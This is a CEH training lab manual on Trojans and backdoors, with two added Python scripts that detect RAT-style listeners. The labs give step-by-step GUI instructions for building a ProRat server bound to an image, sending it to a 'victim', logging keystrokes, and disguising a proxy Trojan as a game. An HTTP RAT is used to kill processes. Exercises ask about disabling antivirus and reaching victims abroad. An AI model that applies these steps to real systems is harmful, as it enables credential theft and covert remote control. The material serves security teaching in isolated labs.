CEH Lab Manual
Module 06 - Trojans and Backdoors

Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
According to Bank Info Security News (http://www.bankinfosecurity.com), Trojans pose serious risks for any personal and sensitive information stored on compromised Android devices, the FBI warns. But experts say any mobile device is potentially at risk because the real problem is malicious applications, which in an open environment are impossible to control. And anywhere malicious apps are around, so is the potential for financial fraud. According to cyber security experts, the banking Trojan known as Citadel, an advanced variant of Zeus, is a keylogger that steals online-banking credentials by capturing keystrokes. Hackers then use stolen login IDs and passwords to access online accounts, take them over, and schedule fraudulent transactions. Hackers created this Trojan specifically for financial fraud and sold it on the black market. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, the theft of valuable data from the network, and identity theft.
Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Creating a server and testing a network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry out this lab, you need:
■ A computer running Windows 7 as Guest-1 in a virtual machine
■ Windows Server 2008 running as Guest-2 in a virtual machine
■ A web browser with Internet access
■ Administrative privileges to run tools
CEH Lab Manual Page 425
Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Lab Duration Time: 40 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard disk. With the help of a Trojan, an attacker gets access to stored passwords in a computer and would be able to read personal documents, delete files, display pictures, and/or show messages on the screen.
Lab Tasks
TASK 1: Overview
Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity. Recommended labs to assist you with Trojans and backdoors:
■ Creating a Server Using the ProRat Tool
■ Wrapping a Trojan Using One File EXE Maker
■ Proxy Server Trojan
■ HTTP Trojan
■ Remote Access Trojans Using Atelier Web Remote Commander
■ Detecting Trojans
■ Creating a Server Using the Theef
■ Creating a Server Using the Biodox
■ Creating a Server Using the MoSucker
■ Hack Windows 7 using Metasploit

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Lab: Creating a Server Using the ProRat Tool
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
As more and more people regularly use the Internet, cyber security is becoming more important for everyone, and yet many people are not aware of it. Hackers are using malware to steal personal information, financial data, and business information by infecting systems with viruses, worms, and Trojan horses. But Internet security is not only about protecting your machine from malware; hackers can also sniff your data, which means that the hackers can listen to your communication with another machine. Other attacks include spoofing, mapping, and hijacking.
Some hackers may take control of your and many other machines to conduct a denial-of-service attack, which makes target computers unavailable for normal business, against high-profile web servers such as banks and credit card gateways. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected
Lab Environment
To carry this out, you need:
■ The ProRat tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat
■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 (virtual machine)
■ Windows Server 2008 running in a virtual machine
■ A web browser with Internet access
■ Administrative privileges to run tools
Lab Duration Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is in the lab, but the actual process of creating the server and the client is the same as shown in this lab.
Lab Tasks
TASK 1: Create Server with ProRat
1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.
2. Double-click ProRat.exe in Windows 8 Virtual Machine.
3. Click Create ProRat Server to start preparing to create a server.
FIGURE 1.1: ProRat main window
4. The Create Server window appears.
Password button: Retrieve passwords from many services, such as POP3 accounts, messenger, IE, mail, etc.
FIGURE 1.2: ProRat Create Server window (Notifications panel: ProConnective, Mail, ICQ Pager and CGI notification)
5. Click General Settings to change features such as Server Port, Server Password, Victim Name, and the port number over which you wish to connect to the victim, or leave the settings at their defaults.
6. Uncheck the highlighted options as shown in the following screenshot.
Note: you can use Dynamic DNS to connect over the Internet by using no-ip account registration.
FIGURE 1.3: ProRat Create Server - General Settings
7. Click Bind with File to bind the server with a file; in this lab we are using a .jpg file to bind the server.
8. Check Bind server with a file. Click Select File, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat\Images.
9. Select the Girl.jpg file to bind with the server.
Clipboard: To read data from random access memory.
FIGURE 1.4: ProRat binding with a file
10. Select Girl.jpg in the window and then click Open to bind the file.
VNC Trojan starts a VNC server daemon in the infected system.
FIGURE 1.5: ProRat binding an image
11. Click OK after selecting the image for binding with a server.
File manager: To manage the victim directory for add, delete, and modify.
12. In Server Extensions settings, select EXE (Has icon support) in the Select Server Extension options.
Give Damage: To format the entire system files.
FIGURE 1.7: ProRat Server Extensions settings
13. In Server Icon select any of the icons, and click the Create Server button at the bottom right side of the ProRat window.
It connects to the victim using any VNC viewer with the password "secret."
FIGURE 1.8: ProRat creating a server
14. Click OK after the server has been prepared, as shown in the following screenshot.
FIGURE 1.9: ProRat server has been created in the same current directory
15. Now you can send the server file by mail or any communication media to the victim's machine as, for example, a celebration file to run.
SHTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (game chess.exe). When executed, it turns a computer into an invisible web server.
FIGURE 1.10: ProRat Create Server (Explorer view of the ProRat folder with the created server)
16. Now go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.
17. Double-click binder_server.exe as shown in the following screenshot.
FIGURE 1.11: ProRat on Windows Server 2008
ICMP Trojan: Covert channels are methods in which an attacker can hide data in a protocol that is undetectable.
18. Now switch to Windows 8 Virtual Machine, enter the IP address of Windows Server 2008 and the live port number as the default in the ProRat main window, and click Connect.
19. In this lab, the IP address of Windows Server 2008 is (10.0.0.13). Note: IP addresses might differ in classroom labs.
FIGURE 1.12: ProRat connecting to infected server
20. Enter the password you provided at the time of creating the server and click OK.
FIGURE 1.13: ProRat connection window
21. Now you are connected to the victim machine. To test the connection, click PC Info and choose the system information as in the following figure.
Covert channels rely on techniques called tunneling, which allow one protocol to be carried over another protocol.
FIGURE 1.14: ProRat connected computer window
22. Now click KeyLogger to steal user passwords for the online system.
TASK 2: Attack System Using Keylogger
FIGURE 1.15: ProRat KeyLogger button
23. The KeyLogger window will appear.
This Trojan works like remote desktop access. The hacker gains complete GUI access of the remote system:
■ Infect the victim's computer with server.exe and plant a Reverse Connecting Trojan.
■ The Trojan connects from the victim's port to the attacker, establishing a reverse connection.
■ The attacker then has complete control over the victim's machine.
FIGURE 1.16: ProRat KeyLogger window
24. Now switch to the Windows Server 2008 machine and open a browser or Notepad and type any text.
Banking Trojans are programs that steal data from infected computers via web browsers and protected storage.
FIGURE 1.17: Text typed in Windows Server 2008 Notepad
25. While the victim is writing a message or entering a user name and password, you can capture the log entry.
26. Now switch to Windows 8 Virtual Machine and click Read Log from time to time to check for data updates from the victim machine.
FIGURE 1.18: ProRat KeyLogger window showing the received key log
27. Now you can use a lot of features from ProRat on the victim's machine.
Note: ProRat Keylogger will not read special characters.
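Steps 18 through 21 above connect to the server on the victim's port, and the sidebar describes the reverse-connection variant, where the implant calls out to the attacker instead. From the defender's side both leave the same trace on the victim: a socket owned by a process running from somewhere an installed program should not live. The following script is an added example, not part of this lab manual or of ProRat; it reviews constructed `netstat -ano`-style lines together with a constructed PID-to-image map (the kind of data `tasklist` provides) and flags listeners or external connections whose owning binary sits in a user-writable path. The port 4499, the PIDs, the peer addresses 10.0.0.5 and 203.0.113.7 and the image paths are all made-up sample values; only 10.0.0.13 comes from the lab.

```python
"""Triage Windows socket ownership for RAT-style listeners and reverse connections.

Added example for this lab, not code from the CEH manual or from ProRat.
The netstat block and PID-to-image map at the bottom are constructed samples.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# `netstat -ano` rows: Proto, Local, Foreign, [State], PID. UDP rows have no State.
NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")

# Directory fragments a service binary has no business living in (lower-case).
USER_WRITABLE_MARKERS = ("\\appdata\\local\\temp\\", "\\downloads\\",
                         "\\desktop\\", "\\users\\public\\")

# Address ranges treated as internal; anything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fe80::/10", "fc00::/7", "::/128")]


@dataclass
class Socket:
    proto: str
    local_host: str
    local_port: Optional[int]
    remote_host: str
    remote_port: Optional[int]
    state: str
    pid: int


def split_endpoint(text: str):
    """'10.0.0.13:4499' -> ('10.0.0.13', 4499); '[::]:135' -> ('::', 135); '*:*' -> ('*', None)."""
    host, port = text.rsplit(":", 1)
    return host.strip("[]"), (None if port == "*" else int(port))


def parse_netstat(text: str) -> List[Socket]:
    sockets = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue  # header and blank lines
        proto, local, remote, state, pid = m.groups()
        lhost, lport = split_endpoint(local)
        rhost, rport = split_endpoint(remote)
        sockets.append(Socket(proto, lhost, lport, rhost, rport, state or "", int(pid)))
    return sockets


def in_user_writable_path(image: str) -> bool:
    path = image.lower().replace("/", "\\")
    return any(marker in path for marker in USER_WRITABLE_MARKERS)


def is_external(host: str) -> bool:
    """True for addresses outside the internal ranges; '*' and hostnames are not classified."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def review_connections(netstat_text: str, pid_to_image: Dict[int, str]) -> List[dict]:
    """Return one finding per (pid, reason) for sockets that match a RAT pattern."""
    findings, seen = [], set()
    for s in parse_netstat(netstat_text):
        image = pid_to_image.get(s.pid, "")
        untrusted = in_user_writable_path(image)
        reason = None
        if s.state == "LISTENING" and not image:
            reason = "listening socket with no known owning process"
        elif s.state == "LISTENING" and untrusted:
            reason = "listening socket owned by a binary in a user-writable path (RAT server pattern)"
        elif s.state in ("ESTABLISHED", "SYN_SENT") and untrusted and is_external(s.remote_host):
            reason = "connection to an external address from a binary in a user-writable path (reverse-connection pattern)"
        if reason and (s.pid, reason) not in seen:
            seen.add((s.pid, reason))
            findings.append({"pid": s.pid, "image": image, "reason": reason,
                             "local": f"{s.local_host}:{s.local_port}",
                             "remote": f"{s.remote_host}:{s.remote_port}"})
    return findings


# Constructed sample data (not captured from the lab machines).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       804
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4499           0.0.0.0:0              LISTENING       2316
  TCP    10.0.0.13:4499         10.0.0.5:49211         ESTABLISHED     2316
  TCP    10.0.0.13:49300        203.0.113.7:443        ESTABLISHED     3120
  UDP    0.0.0.0:5355           *:*                                    1060
"""
SAMPLE_PROCESSES = {
    804: r"C:\Windows\System32\svchost.exe",
    4: "System",
    2316: r"C:\Users\Administrator\AppData\Local\Temp\binder_server.exe",
    3120: r"C:\Users\Administrator\Desktop\update.exe",
    1060: r"C:\Windows\System32\svchost.exe",
}

if __name__ == "__main__":
    for f in review_connections(SAMPLE_NETSTAT, SAMPLE_PROCESSES):
        print(f"PID {f['pid']}: {f['local']} -> {f['remote']}: {f['reason']}")
        print(f"    image: {f['image']}")
```

The output is a triage list, not a verdict: per-user installed software (browsers, updaters) also runs from AppData, so each finding still needs the binary examined (publisher signature, hash, when it first appeared), and the rule set should be extended with the organization's own allowlist of expected listeners.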
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Create a server with advanced options such as Kill AV-FW on start, Disable Windows XP Firewall, etc., send it and connect it to the victim machine, and verify whether you can communicate with the victim machine.
2. Evaluate and examine various methods to connect to victims if they are in other cities or countries.
Tool/Utility: ProRat Tool
Information Collected/Objectives Achieved:
Successful creation of binded server.exe
Output: PC Information
Computer Name: WIN-EGBHISG14L0
User Name: Administrator
Windows Ver:
Windows Language: English (United States)
Windows Path: c:\windows
System Path: c:\windows\system32
Temp Path: c:\Users\ADMINI~1\
Product ID:
Workgroup: NO
Data: 9/23/2012
Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
Lab: Wrapping a Trojan Using One File EXE Maker
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
Sometimes an attacker makes a very secure backdoor, even safer than the normal way to get into a system. A normal user may use only one password for using the system, but a backdoor may need many authentications or SSH layers to let attackers use the system. Usually it is harder to get into the victim system from installed backdoors compared with normal logging in. After getting control of the victim system, the attacker installs a backdoor on the victim system to keep his or her access in the future. It is as easy as running a command on the victim machine. Another way the attacker can install a backdoor is using ActiveX. Whenever a user visits a website, embedded ActiveX could run on the system. Most websites show a message about running ActiveX for voice chat, downloading applications, or verifying the user. In order to protect your system from attacks by Trojans and backdoors, you need extensive knowledge on creating Trojans and backdoors and protecting the system from attackers. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Wrapping a Trojan with a game in Windows Server 2008
■ Running the Trojan to access the game on the front end
■ Analyzing the Trojan running in the backend

Lab Environment
To carry out this lab, you need:
■ OneFileEXEMaker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker
■ A computer running Windows Server 2012 (host)
■ Windows Server 2008 running in a virtual machine
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Administrative privileges to run tools
Lab Duration Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and their appearance may differ from what is in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.
Lab Tasks
TASK 1: OneFile EXE Maker
1. Install OneFileEXEMaker on Windows Server 2008 Virtual Machine.
FIGURE 3.1: OneFile EXE Maker home screen (Senna Spy One EXE Maker 2000 - 2.0a; the tool joins many files into a single EXE file, accepting exe, dll, ocx, txt, jpg and bmp files, with Open Mode, Copy To, Action and Pack Files options)
2. Click the Add File button and browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris and add the Lazaris.exe file.
You can set various tool options such as Open Mode, Copy To, and Action.
FIGURE 3.2: Adding Lazaris game
3. Click Add File and browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans and add the mcafee.exe file.
FIGURE 3.3: Adding MCAFEE.EXE proxy server
4. Select Mcafee and type 8080 in the Command Line Parameters field.
FIGURE 3.4: Assigning port 8080 to MCAFEE
5. Select Lazaris and check the Normal option in Open Mode.
FIGURE 3.5: Setting Lazaris open mode
6. Click Save, browse to save the file on the desktop, and name the file Tetris.exe.
FIGURE 3.6: Trojan created; MCAFEE.EXE will run in the background
7. Now double-click to open the Tetris.exe file. This will launch the Lazaris game on the front end.
FIGURE 3.7: Lazaris game
8. Now open Task Manager and click the Processes tab to check if McAfee is running.
FIGURE 3.8: MCAFEE in Task Manager (the Processes tab lists both LAZARIS.EXE and MCAFEE.EXE running under the Administrator account)
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Tool/Utility | Information Collected/Objectives Achieved
EXE Maker | Output: Using a backdoor, execute Tetris.exe
Questions
1. Use the other options in the Open Mode, Copy To, and Action sections of One File EXE Maker and analyze the results.
2. How will you secure your computer from One File EXE Maker attacks?
Internet Connection Required: □ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
Proxy Server Trojan
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review
Lab Scenario
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of this lab include:
• Starting McAfee Proxy
• Accessing the Internet using McAfee Proxy
Lab Environment
To carry out this lab, you need:
■ McAfee Trojan located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans
■ A computer running Windows Server 2012 (host)
■ Windows Server 2008 running in a virtual machine
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A web browser to access the Internet
■ Administrative privileges to run tools
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
Lab Duration
Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The version and appearance of the created client or host may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.
TASK: Proxy server McAfee
Lab Tasks
1. In the Windows Server 2008 virtual machine, navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types, right-click Proxy Server Trojans, and select CmdHere from the context menu.
FIGURE 4.1: Windows Server 2008: CmdHere
2. Now type the command dir to check the folder contents.
FIGURE 4.2: Directory listing of Proxy Server folder
3. The following image lists the directories and files in the folder.
FIGURE 4.3: Contents of the Proxy Server folder (the dir listing of Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans shows mcafee.exe, 5,328 bytes, and a subdirectory named W3bPr0xyTr0j4nCr34t0r <Funny Name>)
4. Type the command mcafee 8080 to run the service in Windows Server 2008.
FIGURE 4.4: Starting mcafee tool on port 8080
5. The service has started on port 8080.
6. Now go to the Windows Server 2012 host machine and configure the web browser to access the Internet on port 8080.
7. In this lab, launch Chrome and select Settings as shown in the following figure.
Note: This process can be carried out in any browser after setting the LAN settings for the respective browser.
FIGURE 4.5: Internet option of a browser in Windows Server 2012
8. Click the Show advanced settings link to view the Internet settings.
FIGURE 4.6: Advanced Settings of Chrome Browser
9. In Network Settings, click Change proxy settings.
FIGURE 4.7: Changing proxy settings of Chrome Browser
10. In the Internet Properties window, click LAN settings to configure proxy settings.
FIGURE 4.8: LAN Settings of a Chrome Browser (Internet Properties, Connections tab)
11. In the Local Area Network (LAN) Settings window, select the Use a proxy server for your LAN option in the Proxy server section.
12. Enter the IP address of Windows Server 2008, set the port number to 8080, and click OK.
FIGURE 4.9: Proxy settings of LAN in Chrome Browser (Address 10.0.0.13, Port 8080)
13. Now access any web page in the browser (example: www.bbc.co.uk).
FIGURE 4.10: Accessing web page using proxy server
14. The web page will open.
15. Now go back to Windows Server 2008 and check the command prompt.
FIGURE 4.11: Background information on the proxy server (the mcafee 8080 console logs each proxied request, such as www.google.co and www.bbc.co.uk, each followed by "Accepting New Requests")
16. You can see that we have accessed the Internet using the proxy server Trojan.
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Tool/Utility | Information Collected/Objectives Achieved
Proxy Server Trojan | Output: Use the proxy server Trojan to access the Internet. Accessed webpage: www.bbc.co.uk
Questions
1. Determine whether the McAfee HTTP Proxy Server Trojan supports ports other than 8080.
2. Evaluate the drawbacks of using the HTTP proxy server Trojan to access the Internet.
Internet Connection Required: ☑ Yes □ No
Platform Supported: ☑ Classroom □ iLabs
HTTP Trojan
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review
Lab Scenario
Hackers have a variety of motives for installing malevolent software (malware). This type of software tends to yield instant access to the system so that various types of information can be stolen from it continuously, for example a company's strategic designs or credit card numbers. A backdoor is a program or a set of related programs that a hacker installs on the victim computer to allow access to the system at a later time. A backdoor's goal is to remove the evidence of the initial entry from the system's log. Hacker-dedicated websites give examples of many tools that serve to install backdoors, with the difference that once a connection is established the intruder must log in by entering a predefined password. You are a Security Administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
• To run HTTP Trojan on Windows Server 2008
• Access the Windows Server 2008 machine process list using the HTTP Proxy
• Kill running processes on the Windows Server 2008 virtual machine
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
Lab Environment
To carry out this lab, you need:
■ HTTP RAT located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN
■ A computer running Windows Server 2008 (host)
■ Windows 8 running in a virtual machine
■ Windows Server 2008 in a virtual machine
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A web browser to access the Internet
■ Administrative privileges to run tools
Lab Duration
Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The version and appearance of the created client or host may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.
TASK: HTTP RAT
Lab Tasks
1. Log in to the Windows 8 virtual machine, and open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
FIGURE 5.1: Windows 8 Start menu
2. Click Services in the Start menu to launch Services.
Note: Disabling World Wide Web Publisher is mandatory, as HTTP RAT runs on port 80.
FIGURE 5.2: Windows 8 Start menu Apps
3. Disable/Stop the World Wide Web Publishing Service.
FIGURE 5.3: Administrative tools -> Services window
4. Right-click the World Wide Web Publishing Service and select Properties to disable the service.
FIGURE 5.4: Disable/Stop World Wide Web Publishing Service (service name W3SVC, path to executable C:\Windows\system32\svchost.exe -k iissvcs; startup type set to Disabled, service status Stopped)
5. Now start HTTP RAT from the location Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.
Note: The send notification option can be used to send the details to your mail ID.
FIGURE 5.5: HTTP RAT main window
6. Disable the Send notification with ip address to mail option.
7. Click Create to create an httpserver.exe file.
FIGURE 5.6: Create backdoor
Note: The created httpserver will be placed in the tool directory.
FIGURE 5.7: Backdoor server created successfully (the tool reports "done! send httpserver.exe 2 victim")
8. The httpserver.exe file should be created in the folder Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.
9. Double-click the file and click Run.
FIGURE 5.8: Running the backdoor (the Open File - Security Warning dialog reports that the publisher of httpserver.exe could not be verified; click Run)
10. Go to Task Manager and check if the process is running.
FIGURE 5.9: Backdoor running in Task Manager (Httpserver (32 bit) is listed under Background processes)
11. Go to Windows Server 2008 and open a web browser to access the Windows 8 machine (here "10.0.0.12" is the IP address of the Windows 8 machine).
FIGURE 5.10: Access the backdoor in the host web browser (the page reads "welcome 2 HTTP_RAT infected computer }:]" and offers links for running processes, browse, computer info, stop http rat, and homepage)
12. Click running processes to list the processes running on the Windows 8 machine.
FIGURE 5.11: Process list of the victim computer (each process, including httpserver.exe, is listed with a [kill] link)
13. You can kill any running process from here.
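Both the proxy lab and the HTTP RAT lab rely on a tool quietly binding a web port: mcafee.exe on 8080, and httpserver.exe on 80 once W3SVC has been stopped. The following Python script is an added example and is not part of the lab manual or of either tool: it joins `netstat -ano` output (socket to PID) with `tasklist /fo csv /nh` output (PID to image name), flags any listener on 80 or 8080 whose image is not the expected owner, and shows which remote hosts are connected to it. The sample outputs are constructed, not captured; the addresses 10.0.0.12 and 10.0.0.13 and the process names are taken from the lab.

```python
"""Audit who owns the web ports used in the lab (80 and 8080).

Added example, not part of the CEH lab manual. On a real host, feed it the
output of `netstat -ano` and `tasklist /fo csv /nh`; here both are constructed
samples so the script runs offline.
"""
import csv
import io
import re
from dataclasses import dataclass
from typing import Optional

# Expected owners of the lab's web ports. Port 80 on a Windows box running IIS
# belongs to W3SVC, which lives inside svchost.exe (-k iissvcs, see Figure 5.4).
# Nothing is expected to listen on 8080 unless an administrator put a proxy there.
EXPECTED_IMAGES = {80: {"svchost.exe"}, 8080: set()}

# Constructed sample of `netstat -ano` on the Windows 8 victim after the lab:
# httpserver.exe (PID 2044) holds port 80, and the Windows Server 2008 box
# at 10.0.0.13 is connected to it; a mcafee.exe proxy (PID 3120) holds 8080.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2044
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       3120
  TCP    10.0.0.12:80           10.0.0.13:49211        ESTABLISHED     2044
  TCP    127.0.0.1:49152        0.0.0.0:0              LISTENING       480
  UDP    0.0.0.0:3702           *:*                                    1208
"""

# Constructed sample of `tasklist /fo csv /nh` (image, PID, session, session#, mem).
TASKLIST_SAMPLE = """\
"System","4","Services","0","1,540 K"
"lsass.exe","480","Services","0","3,100 K"
"svchost.exe","700","Services","0","6,748 K"
"httpserver.exe","2044","Console","1","1,240 K"
"mcafee.exe","3120","Console","1","1,020 K"
"explorer.exe","1208","Console","1","14,804 K"
"""


@dataclass(frozen=True)
class Socket:
    proto: str
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: Optional[int]   # None for UDP's "*:*"
    state: str                   # "" for UDP rows, which carry no state
    pid: int


# Proto, local addr:port, foreign addr:port, optional state, PID.
_NETSTAT_LINE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\d+|\*)\s+(?:(\S+)\s+)?(\d+)\s*$"
)


def parse_netstat(text: str) -> list:
    """Parse `netstat -ano` rows; header and blank lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = _NETSTAT_LINE.match(line)
        if not m:
            continue
        proto, lip, lport, rip, rport, state, pid = m.groups()
        sockets.append(Socket(proto, lip, int(lport), rip,
                              None if rport == "*" else int(rport),
                              state or "", int(pid)))
    return sockets


def parse_tasklist_csv(text: str) -> dict:
    """Map PID -> lower-cased image name from `tasklist /fo csv /nh` output."""
    images = {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) >= 2 and row[1].isdigit():
            images[int(row[1])] = row[0].lower()
    return images


def audit_web_ports(netstat_text: str, tasklist_text: str,
                    expected: dict = EXPECTED_IMAGES) -> list:
    """Return one finding per TCP listener on an audited port whose owning image
    is not in the allowlist, with the remote peers currently connected to it.
    Note: the image name alone is weak evidence; the lab's binder drops its
    payload under an antivirus-sounding name, so verify path and signature too."""
    sockets = parse_netstat(netstat_text)
    images = parse_tasklist_csv(tasklist_text)
    findings = []
    for s in sockets:
        if s.proto != "TCP" or s.state != "LISTENING" or s.local_port not in expected:
            continue
        image = images.get(s.pid, "<unknown>")
        if image in expected[s.local_port]:
            continue
        peers = sorted({f"{c.remote_ip}:{c.remote_port}" for c in sockets
                        if c.pid == s.pid and c.state == "ESTABLISHED"})
        findings.append({"port": s.local_port, "pid": s.pid,
                         "image": image, "peers": peers})
    return findings


if __name__ == "__main__":
    for f in audit_web_ports(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"port {f['port']} owned by {f['image']} (PID {f['pid']}); "
              f"connected peers: {', '.join(f['peers']) or 'none'}")
```

On a live host, `netstat -anob` prints the image name directly but needs elevation; the two-command join above works from a normal prompt and keeps the raw output for the lab write-up.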
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Tool/Utility | Information Collected/Objectives Achieved
HTTP Trojan | Successfully sent httpserver.exe to the victim machine. Output: Killed processes: System, smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, dwm.exe, splwow64.exe, httpserver.exe, firefox.exe
Questions
